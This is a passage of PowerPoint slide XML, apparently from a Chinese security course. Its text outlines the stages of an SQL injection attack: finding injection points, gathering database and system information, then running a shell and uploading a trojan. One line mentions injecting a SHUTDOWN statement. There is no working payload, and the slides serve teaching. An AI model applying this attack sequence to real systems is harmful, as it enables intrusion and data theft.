          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="70"/>
              </a:spcBef>
              <a:buSzPct val="93333"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SHUTDOWN</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75502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4">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>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34227" y="3096610"/>
            <a:ext cx="114300" cy="216535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1250" spc="40">
                <a:latin typeface="等线"/>
                <a:cs typeface="等线"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="1250">
              <a:latin typeface="等线"/>
              <a:cs typeface="等线"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="456069" y="408305"/>
            <a:ext cx="4130675" cy="2465070"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4130675" h="2465070">
                <a:moveTo>
                  <a:pt x="0" y="2465070"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4130154" y="2465070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4130154" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2465070"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="EFEDE3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="201561" y="408305"/>
            <a:ext cx="172720" cy="2465070"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="172720" h="2465070">
                <a:moveTo>
                  <a:pt x="0" y="2465070"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="172212" y="2465070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="172212" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2465070"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="EFEDE3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414921" y="409067"/>
            <a:ext cx="0" cy="2464435"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="0" h="2464435">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="2464308"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="82296">
            <a:solidFill>
              <a:srgbClr val="191B0E"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3897248" y="433451"/>
            <a:ext cx="660654" cy="216408"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715397" y="621993"/>
            <a:ext cx="1798320" cy="245110"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQ</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>注入漏洞攻击流程</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715397" y="832223"/>
            <a:ext cx="2823210" cy="1330325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="62865" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="495"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>可以通过下面的流程来对</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>注入漏洞进行攻</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>击</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="405"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>寻找注入点</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="170"/>
              </a:spcBef>
              <a:buSzPct val="93333"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>手工方式</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>手工构</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>造</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句进行注入点发</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>现</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="165"/>
              </a:spcBef>
              <a:buSzPct val="93333"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>自动方</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>式</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：使</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>漏洞扫描工具，自动进行注入点发</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>现</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="390"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>信息获取</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="170"/>
              </a:spcBef>
              <a:buSzPct val="93333"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>环境信息：数据库类型、版本</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>操作系统版本、用户信息等。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="165"/>
              </a:spcBef>
              <a:buSzPct val="93333"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>数据库信息：数据库名称、数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>表</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>、表字段、字段内容等。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="380"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>获取权限</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="170"/>
              </a:spcBef>
              <a:buSzPct val="93333"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>获取操作系统权限</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>通过数据库执</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>行</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>上传木</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>马</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="207657" y="414401"/>
            <a:ext cx="4371975" cy="2452370"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4371975" h="2452370">
                <a:moveTo>
                  <a:pt x="4371594" y="2452116"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4371594" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2452116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4371594" y="2452116"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12953">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>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3439" y="901446"/>
            <a:ext cx="4130675" cy="2466340"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4130675" h="2466340">
                <a:moveTo>
                  <a:pt x="0" y="2465832"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4130154" y="2465832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4130154" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2465832"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="EFEDE3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="748931" y="901446"/>
            <a:ext cx="172720" cy="2466340"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="172719" h="2466340">
                <a:moveTo>
                  <a:pt x="0" y="2465832"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="172212" y="2465832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="172212" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2465832"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="EFEDE3"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
